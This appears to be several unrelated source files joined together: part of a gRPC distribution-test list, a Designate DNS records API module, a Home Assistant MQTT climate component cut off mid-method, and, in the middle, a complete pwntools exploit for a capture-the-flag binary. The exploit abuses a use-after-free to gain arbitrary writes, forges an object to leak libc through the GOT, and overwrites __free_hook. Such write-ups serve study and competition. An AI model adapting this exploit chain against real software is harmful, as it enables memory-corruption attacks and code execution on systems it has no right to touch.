testcase='cmake_as_externalproject',
presubmit=True),
# C#
CSharpDistribTest('linux', 'x64', 'jessie', presubmit=True),
CSharpDistribTest('linux', 'x64', 'stretch'),
CSharpDistribTest('linux',
'x64',
'stretch',
use_dotnet_cli=True,
presubmit=True),
CSharpDistribTest('linux', 'x64', 'centos7'),
CSharpDistribTest('linux', 'x64', 'ubuntu1604'),
CSharpDistribTest('linux', 'x64', 'ubuntu1604', use_dotnet_cli=True),
CSharpDistribTest('linux',
'x64',
'alpine',
use_dotnet_cli=True,
presubmit=True),
CSharpDistribTest('linux',
'x64',
'dotnet31',
use_dotnet_cli=True,
presubmit=True),
CSharpDistribTest('linux',
'x64',
'dotnet5',
use_dotnet_cli=True,
presubmit=True),
CSharpDistribTest('macos', 'x64', presubmit=True),
CSharpDistribTest('windows', 'x86', presubmit=True),
CSharpDistribTest('windows', 'x64', presubmit=True),
# Python
PythonDistribTest('linux', 'x64', 'buster', presubmit=True),
PythonDistribTest('linux', 'x86', 'buster', presubmit=True),
PythonDistribTest('linux', 'x64', 'centos7'),
PythonDistribTest('linux', 'x64', 'fedora34'),
PythonDistribTest('linux', 'x64', 'opensuse'),
PythonDistribTest('linux', 'x64', 'arch'),
PythonDistribTest('linux', 'x64', 'ubuntu1804'),
PythonDistribTest('linux', 'aarch64', 'python38_buster',
presubmit=True),
PythonDistribTest('linux',
'x64',
'alpine3.7',
source=True,
presubmit=True),
PythonDistribTest('linux', 'x64', 'buster', source=True,
presubmit=True),
PythonDistribTest('linux', 'x86', 'buster', source=True,
presubmit=True),
PythonDistribTest('linux', 'x64', 'centos7', source=True),
PythonDistribTest('linux', 'x64', 'fedora34', source=True),
PythonDistribTest('linux', 'x64', 'arch', source=True),
PythonDistribTest('linux', 'x64', 'ubuntu1804', source=True),
# Ruby
RubyDistribTest('linux', 'x64', 'stretch', ruby_version='ruby_2_5'),
RubyDistribTest('linux', 'x64', 'stretch', ruby_version='ruby_2_6'),
RubyDistribTest('linux',
'x64',
'stretch',
ruby_version='ruby_2_7',
presubmit=True),
# TODO(apolcyn): add a ruby 3.0 test once protobuf adds support
RubyDistribTest('linux',
'x64',
'stretch',
ruby_version='ruby_2_5',
source=True,
presubmit=True),
RubyDistribTest('linux', 'x64', 'centos7'),
RubyDistribTest('linux', 'x64', 'ubuntu1604'),
RubyDistribTest('linux', 'x64', 'ubuntu1804', presubmit=True),
# PHP7
PHP7DistribTest('linux', 'x64', 'stretch', presubmit=True),
PHP7DistribTest('macos', 'x64', presubmit=True),
]
|
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *
context(arch='amd64', os='linux', aslr=True, terminal=['tmux', 'neww'])
env = {'LD_PRELOAD': './libvtv.so.0'}
if args['GDB']:
io = gdb.debug('./ragnarok.bin', env=env, gdbscript='''\
set follow-fork-mode parent
c
''')
elf, libc = io.elf, ELF('libs/amd64/2.26/0ubuntu2/libc-2.26.so')
else:
io = process('./ragnarok.bin-amd64-2.26-0ubuntu2', env=env)
elf, libc = io.elf, ELF('libs/amd64/2.26/0ubuntu2/libc-2.26.so')
# thanks to https://gist.github.com/saelo/0c77ce6c2b84af70644d81802892c289
# tl; dr
# obtained arbitrary writes thanks to a use-after-free vulnerability, and used them
# to overwrite __free_hook with puts() and execute the code at line 715 of ragnarok.cc
def earn_money(n):
char_matchers = {
'h': re.compile(r'^ \S \S '),
'i': re.compile(r'^ \S\S\S '),
't': re.compile(r'^ \S\S\S\S\S\S\S '),
'c': re.compile(r'^ \S\S\S\S \n \S '),
'o': re.compile(r'^ \S\S\S\S \n \S \S '),
'n': re.compile(r'^ \S \S ')
}
for _ in range(n):
io.recvuntil('***************************\n')
output = io.recvuntil('\n***************************\n', drop=True)
io.recvuntil('Magic : ')
for c, p in char_matchers.items():
if p.match(output):
io.sendline(c)
break
else:
raise AssertionError
io.sendline('q')
def fight():
while True:
# always attack
io.recvuntil('Your choice :')
io.sendline('1')
while True:
output = io.recvline()
if 'You died' in output:
return False
elif 'You win' in output:
io.recvuntil('Name :')
io.sendline('integeruser')
return True
elif '=============' in output:
break
# to trigger the vulnerability (explained later) and exploit the binary,
# we need to equip Odin with a weapon named "Gungnir"
# to make and equip any weapon we need lots of money, but enough of it can be earned
# by choosing Thor and winning a fight
while True:
# earn some money to be able to continue if defeated in fight
io.recvuntil('Your choice :')
io.sendline('3')
earn_money(3)
# choose Thor
io.recvuntil('Your choice :')
io.sendline('1')
io.recvuntil('Choose your figure :')
io.sendline('2')
# fight
io.recvuntil('Your choice :')
io.sendline('5')
won = fight()
if won: break
# defeated, continue?
io.sendline('1')
success('Fight won')
# now we have enough money to make and equip a weapon, but we need to switch
# character from Thor to Odin
# to do so, fight again until defeated
while True:
# fight
io.recvuntil('Your choice :')
io.sendline('5')
won = fight()
if not won:
# defeated, continue?
io.sendline('1')
break
success('Fight lost')
# now we can choose a new character
# choose Odin
io.recvuntil('Your choice :')
io.sendline('1')
io.recvuntil('Choose your figure :')
io.sendline('1')
# equipping a weapon named "Gungnir" to Odin triggers the execution of
# `cast_spell(shared_ptr<Figure>(this))` at line 173, resulting in two different shared pointers
# for the same object (the other pointer is the global `shared_ptr<Figure> character`
# at line 122)
# when `cast_spell()` terminates, the chunk pointed by the local shared pointer will be freed,
# resulting in a use-after-free for the global pointer
io.recvuntil('Your choice :')
io.sendline('4')
io.recvuntil('Name of your weapon :')
io.sendline('Gungnir')
# `std::string`s are represented in memory as:
# {
# pointer to data buffer,
# current size,
# maximum size (capacity)
# }
# in string assignments, if the capacity of the destination string is greater or equal
# to the size of the source string, then the content of the source data buffer
# is simply memcpy'ed to the destination data buffer
# if we change description (see `change_descript()` at line 545) with a string big enough,
# then the `std::string desc` allocated at line 549 will overlap the chunk containing
# the data for the chosen character
# in this way, in the string assignment `desc = str` at line 69, we control both
# the full structure of `desc` (destination) and the content of `str` (source),
# and by manipulating the structure of `desc` we obtain an arbitrary memcpy
io.recvuntil('Your choice :')
io.sendline('6')
io.recvuntil('Description : ')
# we use this arbitrary write to construct a fake Odin figure in BSS and change
# the global `character` pointer to point to it
vtable_odin_address = 0x40c700
where = 0x613648
fake_odin_address = 0x613648 + 0x8 * 12
what = ''.join(
p64(data)
for data in [
0x0,
fake_odin_address, # `character` (line 122)
0x0,
0x0,
0x0,
where, # pointer to data buffer
0xffffffffffffffff, # size
0xffffffffffffffff, # capacity (also overlaps with `money` and `highest` (lines 124-125))
0x0,
0x0,
0x0,
0x0,
# fake Odin figure
vtable_odin_address,
0x0, # `name`
0x0,
0x0,
0x0,
fake_odin_address, # `desc` (**)
0x100,
0x100,
0x0,
elf.symbols['got.free'], # `weapon` (*)
0x8,
0x8,
0x0,
0x41414141, # `atk`
0x41414141, # `hp`
])
io.sendline(what)
# now, this fake figure was constructed in such a way that the `std::string` structure
# for `weapon` (see (*)) points to the GOT address of free()
# in this way, we can simply call `show_figure()` at line 530 to leak the address of free()
io.recvuntil('Your choice :')
io.sendline('2')
io.recvuntil('Weapon : ')
free_address = u64(io.recvn(8))
if free_address != libc.symbols['free']:
libc.address = free_address - libc.symbols['free']
success('libc.address: %s' % hex(libc.address))
__free_hook_address = libc.symbols['__free_hook']
success('__free_hook_address: %s' % hex(__free_hook_address))
# in the same way, the `std::string` structure for `desc` (see (**)) was crafted
# in such a way that when `change_descript()` is called and `change_desc()` invoked
# we obtain an arbitrary write at the address of its data buffer
io.recvuntil('Your choice :')
io.sendline('6')
io.recvuntil('Description : ')
# we use this arbitrary write to change the `weapon` of our fake Odin figure to
# point to the address of __free_hook
where = fake_odin_address
what = ''.join(
p64(data)
for data in [
vtable_odin_address,
0x0, # `name`
0x0,
0x0,
0x0,
where, # `desc`
0x0,
0x0,
0x0,
__free_hook_address, # `weapon`
0x0, # the string must be empty to pass the check at line 166
0x8
])
io.sendline(what)
# now, we trigger the arbitrary write `weapon = str` at line 167 and set __free_hook to puts()
io.recvuntil('Your choice :')
io.sendline('4')
io.recvuntil('Name of your weapon :')
io.sendline(p64(libc.symbols['puts']))
# win any fight to print the flag on screen
io.recvuntil('Your choice :')
io.sendline('5')
io.sendline('1')
io.recvuntil('Something for you :)')
io.interactive()
|
|
# Copyright 2012 Managed I.T.
#
# Author: Kiall Mac Innes <kiall@managedit.ie>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import flask
from oslo_log import log as logging
from designate.central import rpcapi as central_rpcapi
from designate import exceptions
from designate import objects
from designate import schema
from designate import utils
LOG = logging.getLogger(__name__)
blueprint = flask.Blueprint('records', __name__)
record_schema = schema.Schema('v1', 'record')
records_schema = schema.Schema('v1', 'records')
def _find_recordset(context, domain_id, name, type):
central_api = central_rpcapi.CentralAPI.get_instance()
return central_api.find_recordset(context, {
'zone_id': domain_id,
'name': name,
'type': type,
})
def _find_or_create_recordset(context, domain_id, name, type, ttl):
central_api = central_rpcapi.CentralAPI.get_instance()
criterion = {"id": domain_id, "type": "PRIMARY", "action": "!DELETE"}
central_api.find_zone(context, criterion=criterion)
try:
# Attempt to create an empty recordset
values = {
'name': name,
'type': type,
'ttl': ttl,
}
recordset = central_api.create_recordset(
context, domain_id, objects.RecordSet(**values))
except exceptions.DuplicateRecordSet:
# Fetch the existing recordset
recordset = _find_recordset(context, domain_id, name, type)
return recordset
def _extract_record_values(values):
record_values = dict((k, values[k]) for k in ('data', 'description',)
if k in values)
if values.get('priority', None) is not None:
record_values['data'] = '%d %s' % (
values['priority'], record_values['data'])
return record_values
def _extract_recordset_values(values):
recordset_values = ('name', 'type', 'ttl',)
return dict((k, values[k]) for k in recordset_values if k in values)
def _format_record_v1(record, recordset):
record = dict(record)
record['priority'], record['data'] = utils.extract_priority_from_data(
recordset.type, record)
record['domain_id'] = record['zone_id']
del record['zone_id']
record.update({
'name': recordset['name'],
'type': recordset['type'],
'ttl': recordset['ttl'],
})
return record
@blueprint.route('/schemas/record', methods=['GET'])
def get_record_schema():
return flask.jsonify(record_schema.raw)
@blueprint.route('/schemas/records', methods=['GET'])
def get_records_schema():
return flask.jsonify(records_schema.raw)
@blueprint.route('/domains/<uuid:domain_id>/records', methods=['POST'])
def create_record(domain_id):
context = flask.request.environ.get('context')
values = flask.request.json
record_schema.validate(values)
if values['type'] == 'SOA':
raise exceptions.BadRequest('SOA records cannot be manually created.')
recordset = _find_or_create_recordset(context,
domain_id,
values['name'],
values['type'],
values.get('ttl', None))
record = objects.Record(**_extract_record_values(values))
central_api = central_rpcapi.CentralAPI.get_instance()
record = central_api.create_record(context, domain_id,
recordset['id'],
record)
record = _format_record_v1(record, recordset)
response = flask.jsonify(record_schema.filter(record))
response.status_int = 201
response.location = flask.url_for('.get_record', domain_id=domain_id,
record_id=record['id'])
return response
@blueprint.route('/domains/<uuid:domain_id>/records', methods=['GET'])
def get_records(domain_id):
context = flask.request.environ.get('context')
central_api = central_rpcapi.CentralAPI.get_instance()
# NOTE: We need to ensure the domain actually exists, otherwise we may
# return an empty records array instead of a domain not found
central_api.get_zone(context, domain_id)
recordsets = central_api.find_recordsets(context, {'zone_id': domain_id})
records = []
for rrset in recordsets:
records.extend([_format_record_v1(r, rrset) for r in rrset.records])
return flask.jsonify(records_schema.filter({'records': records}))
@blueprint.route('/domains/<uuid:domain_id>/records/<uuid:record_id>',
methods=['GET'])
def get_record(domain_id, record_id):
context = flask.request.environ.get('context')
central_api = central_rpcapi.CentralAPI.get_instance()
# NOTE: We need to ensure the domain actually exists, otherwise we may
# return an record not found instead of a domain not found
central_api.get_zone(context, domain_id)
criterion = {'zone_id': domain_id, 'id': record_id}
record = central_api.find_record(context, criterion)
recordset = central_api.get_recordset(
context, domain_id, record['recordset_id'])
record = _format_record_v1(record, recordset)
return flask.jsonify(record_schema.filter(record))
@blueprint.route('/domains/<uuid:domain_id>/records/<uuid:record_id>',
methods=['PUT'])
def update_record(domain_id, record_id):
context = flask.request.environ.get('context')
values = flask.request.json
central_api = central_rpcapi.CentralAPI.get_instance()
# NOTE: We need to ensure the domain actually exists, otherwise we may
# return a record not found instead of a domain not found
criterion = {"id": domain_id, "type": "PRIMARY", "action": "!DELETE"}
central_api.find_zone(context, criterion)
# Fetch the existing resource
# NOTE(kiall): We use "find_record" rather than "get_record" as we do not
# have the recordset_id.
criterion = {'zone_id': domain_id, 'id': record_id}
record = central_api.find_record(context, criterion)
# TODO(graham): Move this further down the stack
if record.managed and not context.edit_managed_records:
raise exceptions.BadRequest('Managed records may not be updated')
# Find the associated recordset
recordset = central_api.get_recordset(
context, domain_id, record.recordset_id)
# Prepare a dict of fields for validation
record_data = record_schema.filter(_format_record_v1(record, recordset))
record_data.update(values)
# Validate the new set of data
record_schema.validate(record_data)
# Update and persist the resource
record.update(_extract_record_values(values))
record = central_api.update_record(context, record)
# Update the recordset resource (if necessary)
recordset.update(_extract_recordset_values(values))
if len(recordset.obj_what_changed()) > 0:
recordset = central_api.update_recordset(context, recordset)
# Format and return the response
record = _format_record_v1(record, recordset)
return flask.jsonify(record_schema.filter(record))
def _delete_recordset_if_empty(context, domain_id, recordset_id):
central_api = central_rpcapi.CentralAPI.get_instance()
recordset = central_api.find_recordset(context, {
'id': recordset_id
})
# Make sure it's the right recordset
if len(recordset.records) == 0:
central_api.delete_recordset(context, domain_id, recordset_id)
@blueprint.route('/domains/<uuid:domain_id>/records/<uuid:record_id>',
methods=['DELETE'])
def delete_record(domain_id, record_id):
context = flask.request.environ.get('context')
central_api = central_rpcapi.CentralAPI.get_instance()
# NOTE: We need to ensure the domain actually exists, otherwise we may
# return a record not found instead of a domain not found
criterion = {"id": domain_id, "type": "PRIMARY", "action": "!DELETE"}
central_api.find_zone(context, criterion=criterion)
# Find the record
criterion = {'zone_id': domain_id, 'id': record_id}
record = central_api.find_record(context, criterion)
central_api.delete_record(
context, domain_id, record['recordset_id'], record_id)
_delete_recordset_if_empty(context, domain_id, record['recordset_id'])
return flask.Response(status=200)
|
|
"""
Support for MQTT climate devices.
For more details about this platform, please refer to the documentation
https://home-assistant.io/components/climate.mqtt/
"""
import asyncio
import logging
import voluptuous as vol
from homeassistant.core import callback
import homeassistant.components.mqtt as mqtt
from homeassistant.components.climate import (
STATE_HEAT, STATE_COOL, STATE_DRY, STATE_FAN_ONLY, ClimateDevice,
PLATFORM_SCHEMA as CLIMATE_PLATFORM_SCHEMA, STATE_AUTO,
ATTR_OPERATION_MODE, SUPPORT_TARGET_TEMPERATURE, SUPPORT_OPERATION_MODE,
SUPPORT_SWING_MODE, SUPPORT_FAN_MODE, SUPPORT_AWAY_MODE, SUPPORT_HOLD_MODE,
SUPPORT_AUX_HEAT)
from homeassistant.const import (
STATE_ON, STATE_OFF, ATTR_TEMPERATURE, CONF_NAME)
from homeassistant.components.mqtt import (CONF_QOS, CONF_RETAIN,
MQTT_BASE_PLATFORM_SCHEMA)
import homeassistant.helpers.config_validation as cv
from homeassistant.components.fan import (SPEED_LOW, SPEED_MEDIUM,
SPEED_HIGH)
_LOGGER = logging.getLogger(__name__)
DEPENDENCIES = ['mqtt']
DEFAULT_NAME = 'MQTT HVAC'
CONF_POWER_COMMAND_TOPIC = 'power_command_topic'
CONF_POWER_STATE_TOPIC = 'power_state_topic'
CONF_MODE_COMMAND_TOPIC = 'mode_command_topic'
CONF_MODE_STATE_TOPIC = 'mode_state_topic'
CONF_TEMPERATURE_COMMAND_TOPIC = 'temperature_command_topic'
CONF_TEMPERATURE_STATE_TOPIC = 'temperature_state_topic'
CONF_FAN_MODE_COMMAND_TOPIC = 'fan_mode_command_topic'
CONF_FAN_MODE_STATE_TOPIC = 'fan_mode_state_topic'
CONF_SWING_MODE_COMMAND_TOPIC = 'swing_mode_command_topic'
CONF_SWING_MODE_STATE_TOPIC = 'swing_mode_state_topic'
CONF_AWAY_MODE_COMMAND_TOPIC = 'away_mode_command_topic'
CONF_AWAY_MODE_STATE_TOPIC = 'away_mode_state_topic'
CONF_HOLD_COMMAND_TOPIC = 'hold_command_topic'
CONF_HOLD_STATE_TOPIC = 'hold_state_topic'
CONF_AUX_COMMAND_TOPIC = 'aux_command_topic'
CONF_AUX_STATE_TOPIC = 'aux_state_topic'
CONF_CURRENT_TEMPERATURE_TOPIC = 'current_temperature_topic'
CONF_PAYLOAD_ON = 'payload_on'
CONF_PAYLOAD_OFF = 'payload_off'
CONF_FAN_MODE_LIST = 'fan_modes'
CONF_MODE_LIST = 'modes'
CONF_SWING_MODE_LIST = 'swing_modes'
CONF_INITIAL = 'initial'
CONF_SEND_IF_OFF = 'send_if_off'
SCHEMA_BASE = CLIMATE_PLATFORM_SCHEMA.extend(MQTT_BASE_PLATFORM_SCHEMA.schema)
PLATFORM_SCHEMA = SCHEMA_BASE.extend({
vol.Optional(CONF_POWER_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(CONF_MODE_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(CONF_TEMPERATURE_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(CONF_FAN_MODE_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(CONF_SWING_MODE_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(CONF_AWAY_MODE_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(CONF_HOLD_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(CONF_AUX_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(CONF_POWER_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_MODE_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_TEMPERATURE_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_FAN_MODE_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_SWING_MODE_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_AWAY_MODE_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_HOLD_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_AUX_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_CURRENT_TEMPERATURE_TOPIC):
mqtt.valid_subscribe_topic,
vol.Optional(CONF_FAN_MODE_LIST,
default=[STATE_AUTO, SPEED_LOW,
SPEED_MEDIUM, SPEED_HIGH]): cv.ensure_list,
vol.Optional(CONF_SWING_MODE_LIST,
default=[STATE_ON, STATE_OFF]): cv.ensure_list,
vol.Optional(CONF_MODE_LIST,
default=[STATE_AUTO, STATE_OFF, STATE_COOL, STATE_HEAT,
STATE_DRY, STATE_FAN_ONLY]): cv.ensure_list,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_INITIAL, default=21): cv.positive_int,
vol.Optional(CONF_SEND_IF_OFF, default=True): cv.boolean,
vol.Optional(CONF_PAYLOAD_ON, default="ON"): cv.string,
vol.Optional(CONF_PAYLOAD_OFF, default="OFF"): cv.string,
})
@asyncio.coroutine
def async_setup_platform(hass, config, async_add_devices, discovery_info=None):
"""Set up the MQTT climate devices."""
async_add_devices([
MqttClimate(
hass,
config.get(CONF_NAME),
{
key: config.get(key) for key in (
CONF_POWER_COMMAND_TOPIC,
CONF_MODE_COMMAND_TOPIC,
CONF_TEMPERATURE_COMMAND_TOPIC,
CONF_FAN_MODE_COMMAND_TOPIC,
CONF_SWING_MODE_COMMAND_TOPIC,
CONF_AWAY_MODE_COMMAND_TOPIC,
CONF_HOLD_COMMAND_TOPIC,
CONF_AUX_COMMAND_TOPIC,
CONF_POWER_STATE_TOPIC,
CONF_MODE_STATE_TOPIC,
CONF_TEMPERATURE_STATE_TOPIC,
CONF_FAN_MODE_STATE_TOPIC,
CONF_SWING_MODE_STATE_TOPIC,
CONF_AWAY_MODE_STATE_TOPIC,
CONF_HOLD_STATE_TOPIC,
CONF_AUX_STATE_TOPIC,
CONF_CURRENT_TEMPERATURE_TOPIC
)
},
config.get(CONF_QOS),
config.get(CONF_RETAIN),
config.get(CONF_MODE_LIST),
config.get(CONF_FAN_MODE_LIST),
config.get(CONF_SWING_MODE_LIST),
config.get(CONF_INITIAL),
False, None, SPEED_LOW,
STATE_OFF, STATE_OFF, False,
config.get(CONF_SEND_IF_OFF),
config.get(CONF_PAYLOAD_ON),
config.get(CONF_PAYLOAD_OFF))
])
class MqttClimate(ClimateDevice):
"""Representation of a demo climate device."""
def __init__(self, hass, name, topic, qos, retain, mode_list,
fan_mode_list, swing_mode_list, target_temperature, away,
hold, current_fan_mode, current_swing_mode,
current_operation, aux, send_if_off, payload_on,
payload_off):
"""Initialize the climate device."""
self.hass = hass
self._name = name
self._topic = topic
self._qos = qos
self._retain = retain
self._target_temperature = target_temperature
self._unit_of_measurement = hass.config.units.temperature_unit
self._away = away
self._hold = hold
self._current_temperature = None
self._current_fan_mode = current_fan_mode
self._current_operation = current_operation
self._aux = aux
self._current_swing_mode = current_swing_mode
self._fan_list = fan_mode_list
self._operation_list = mode_list
self._swing_list = swing_mode_list
self._target_temperature_step = 1
self._send_if_off = send_if_off
self._payload_on = payload_on
self._payload_off = payload_off
def async_added_to_hass(self):
"""Handle being added to home assistant."""
@callback
def handle_current_temp_received(topic, payload, qos):
"""Handle current temperature coming via MQTT."""
try:
self._current_temperature = float(payload)
self.async_schedule_update_ha_state()
except ValueError:
_LOGGER.error("Could not parse temperature from %s", payload)
if self._topic[CONF_CURRENT_TEMPERATURE_TOPIC] is not None:
yield from mqtt.async_subscribe(
self.hass, self._topic[CONF_CURRENT_TEMPERATURE_TOPIC],
handle_current_temp_received, self._qos)
@callback
def handle_mode_received(topic, payload, qos):
"""Handle receiving mode via MQTT."""
if payload not in self._operation_list:
_LOGGER.error("Invalid mode: %s", payload)
else:
self._current_operation = payload
self.async_schedule_update_ha_state()
if self._topic[CONF_MODE_STATE_TOPIC] is not None:
yield from mqtt.async_subscribe(
self.hass, self._topic[CONF_MODE_STATE_TOPIC],
handle_mode_received, self._qos)
@callback
def handle_temperature_received(topic, payload, qos):
"""Handle target temperature coming via MQTT."""
try:
self._target_temperature = float(payload)
self.async_schedule_update_ha_state()
except ValueError:
_LOGGER.error("Could not parse temperature from %s", payload)
if self._topic[CONF_TEMPERATURE_STATE_TOPIC] is not None:
yield from mqtt.async_subscribe(
self.hass, self._topic[CONF_TEMPERATURE_STATE_TOPIC],
handle_temperature_received, self._qos)
@callback
def handle_fan_mode_received(topic, payload, qos):
"""Handle receiving fan mode via MQTT."""
if payload not in self._fan_list:
_LOGGER.error("Invalid fan mode: %s", payload)
else:
self._current_fan_mode = payload
self.async_schedule_update_ha_state()
if self._topic[CONF_FAN_MODE_STATE_TOPIC] is not None:
yield from mqtt.async_subscribe(
self.hass, self._topic[CONF_FAN_MODE_STATE_TOPIC],
handle_fan_mode_received, self._qos)
@callback
def handle_swing_mode_received(topic, payload, qos):
"""Handle receiving swing mode via MQTT."""
if payload not in self._swing_list:
_LOGGER.error("Invalid swing mode: %s", payload)
else:
self._current_swing_mode = payload
self.async_schedule_update_ha_state()
if self._topic[CONF_SWING_MODE_STATE_TOPIC] is not None:
yield from mqtt.async_subscribe(
self.hass, self._topic[CONF_SWING_MODE_STATE_TOPIC],
handle_swing_mode_received, self._qos)
@callback
def handle_away_mode_received(topic, payload, qos):
"""Handle receiving away mode via MQTT."""
if payload == self._payload_on:
self._away = True
elif payload == self._payload_off:
self._away = False
else:
_LOGGER.error("Invalid away mode: %s", payload)
self.async_schedule_update_ha_state()
if self._topic[CONF_AWAY_MODE_STATE_TOPIC] is not None:
yield from mqtt.async_subscribe(
self.hass, self._topic[CONF_AWAY_MODE_STATE_TOPIC],
handle_away_mode_received, self._qos)
@callback
def handle_aux_mode_received(topic, payload, qos):
"""Handle receiving aux mode via MQTT."""
if payload == self._payload_on:
self._aux = True
elif payload == self._payload_off:
self._aux = False
else:
_LOGGER.error("Invalid aux mode: %s", payload)
self.async_schedule_update_ha_state()
if self._topic[CONF_AUX_STATE_TOPIC] is not None:
yield from mqtt.async_subscribe(
self.hass, self._topic[CONF_AUX_STATE_TOPIC],
handle_aux_mode_received, self._qos)
@callback
def handle_hold_mode_received(topic, payload, qos):
"""Handle receiving hold mode via MQTT."""
self._hold = payload
self.async_schedule_update_ha_state()
if self._topic[CONF_HOLD_STATE_TOPIC] is not None:
yield from mqtt.async_subscribe(
self.hass, self._topic[CONF_HOLD_STATE_TOPIC],
handle_hold_mode_received, self._qos)
@property
def should_poll(self):
"""Return the polling state."""
return False
@property
def name(self):
"""Return the name of the climate device."""
return self._name
@property
def temperature_unit(self):
"""Return the unit of measurement."""
return self._unit_of_measurement
@property
def current_temperature(self):
"""Return the current temperature."""
return self._current_temperature
@property
def target_temperature(self):
"""Return the temperature we try to reach."""
return self._target_temperature
@property
def current_operation(self):
"""Return current operation ie. heat, cool, idle."""
return self._current_operation
@property
def operation_list(self):
"""Return the list of available operation modes."""
return self._operation_list
@property
def target_temperature_step(self):
"""Return the supported step of target temperature."""
return self._target_temperature_step
@property
def is_away_mode_on(self):
"""Return if away mode is on."""
return self._away
@property
def current_hold_mode(self):
"""Return hold mode setting."""
return self._hold
@property
def is_aux_heat_on(self):
"""Return true if away mode is on."""
return self._aux
@property
def current_fan_mode(self):
"""Return the fan setting."""
return self._current_fan_mode
@property
def fan_list(self):
"""Return the list of available fan modes."""
return self._fan_list
@asyncio.coroutine
def async_set_temperature(self, **kwargs):
"""Set new target temperatures."""
if kwargs.get(ATTR_OPERATION_MODE) is not None:
operation_mode = kwargs.get(ATTR_OPERATION_MODE)
yield from self.async_set_operation_mode(operation_mode)
if kwargs.get(ATTR_TEMPERATURE) is not None:
if self._topic[CONF_TEMPERATURE_STATE_TOPIC] is None:
# optimistic mode
self._target_temperature = kwargs.get(ATTR_TEMPERATURE)
if self._send_if_off or self._current_operation != STATE_OFF:
mqtt.async_publish(
self.hass, self._topic[CONF_TEMPERATURE_COMMAND_TOPIC],
kwargs.get(ATTR_TEMPERATURE), self._qos, self._retain)
self.async_schedule_update_ha_state()
@asyncio.coroutine
def async_set_swing_mode(self, swing_mode):
"""Set new swing mode."""
if self._send_if_off or self._current_operation != STATE_OFF:
mqtt.async_publish(
self.hass, self._topic[CONF_SWING_MODE_COMMAND_TOPIC],
swing_mode, self._qos, self._retain)
if self._topic[CONF_SWING_MODE_STATE_TOPIC] is None:
self._current_swing_mode = swing_mode
self.async_schedule_update_ha_state()
@asyncio.coroutine
def async_set_fan_mode(self, fan):
"""Set new target temperature."""
if self._send_if_off or self._current_operation != STATE_OFF:
mqtt.async_publish(
self.hass, self._topic[CONF_FAN_MODE_COMMAND_TOPIC],
fan, self._qos, self._retain)
if self._topic[CONF_FAN_MODE_STATE_TOPIC] is None:
self._current_fan_mode = fan
self.async_schedule_update_ha_state()
@asyncio.coroutine
def async_set_operation_mode(self, operation_mode) -> None:
"""Set new operation mode."""
if self._topic[CONF_POWER_COMMAND_TOPIC] is not None:
if (self._current_operation == STATE_OFF and
operation_mode != STATE_OFF):
mqtt.async_publish(
self.hass, self._topic[CONF_POWER_COMMAND_TOPIC],
self._payload_on, self._qos, self._retain)
elif (self._current_operation != STATE_OFF and
operation_mode == STATE_OFF):
mqtt.async_publish(
self.hass, self._topic[CONF_POWER_COMMAND_TOPIC],
self._payload_off, self._qos, self._retain)
if self._topic[CONF_MODE_COMMAND_TOPIC] is not None:
mqtt.async_publish(
self.hass, self._topic[CONF_MODE_COMMAND_TOPIC],
operation_mode, self._qos, self._retain)
if self._topic[CONF_MODE_STATE_TOPIC] is None:
self._current_operation = operation_mode
self.async_schedule_update_ha_state()
@property
def current_swing_mode(self):
"""Return the swing setting."""
return self._current_swing_mode
@property
def swing_list(self):
"""List of available swing modes."""
return self._swing_list
@asyncio.coroutine
def async_turn_away_mode_on(self):
"""Turn away mode on."""
if self._topic[CONF_AWAY_MODE_COMMAND_TOPIC] is not None:
mqtt.async_publish(self.hass,
self._topic[CONF_AWAY_MODE_COMMAND_TOPIC],
self._payload_on, self._qos, self._retain)
if self._topic[CONF_AWAY_MODE_STATE_TOPIC] is None:
self._away = True
self.async_schedule_update_ha_state()
@asyncio.coroutine
def async_turn_away_mode_off(self):
"""Turn away mode off."""
if self._topic[CONF_AWAY_MODE_COMMAND_TOPIC] is not None:
mqtt.async_publish(self.hass,
self._topic[CONF_AWAY_MODE_COMMAND_TOPIC],
self._payload_off, self._qos, self._retain)
if self._topic[CONF_AWAY_MODE_STATE_TOPIC] is None:
self._away = False
self.async_schedule_update_ha_state()
@asyncio.coroutine
def async_set_hold_mode(self, hold):
"""Update hold mode on."""
if self._topic[CONF_HOLD_COMMAND_TOPIC] is not None:
mqtt.async_publish(self.hass,
self._topic[CONF_HOLD_COMMAND_TOPIC],
hold, self._qos, self._retain)
if self._topic[CONF_HOLD_STATE_TOPIC] is None:
self._hold = hold
self.async_schedule_update_ha_state()
@asyncio.coroutine
def async_turn_aux_heat_on(self):
"""Turn auxillary heater on."""
if self._topic[CONF_AUX_COMMAND_TOPIC] is not None:
mqtt.async_publish(self.hass, self._topic[CONF_AUX_COMMAND_TOPIC],
self._payload_on, self._qos, self._retain)
if self._topic[CONF_AUX_STATE_TOPIC] is None:
self._aux = True
self.async_schedule_update_ha_state()
@asyncio.coroutine
def async_turn_aux_heat_off(self):
"""Turn auxillary heater off."""
if self._topic[CONF_AUX_COMMAND_TOPIC] is not None:
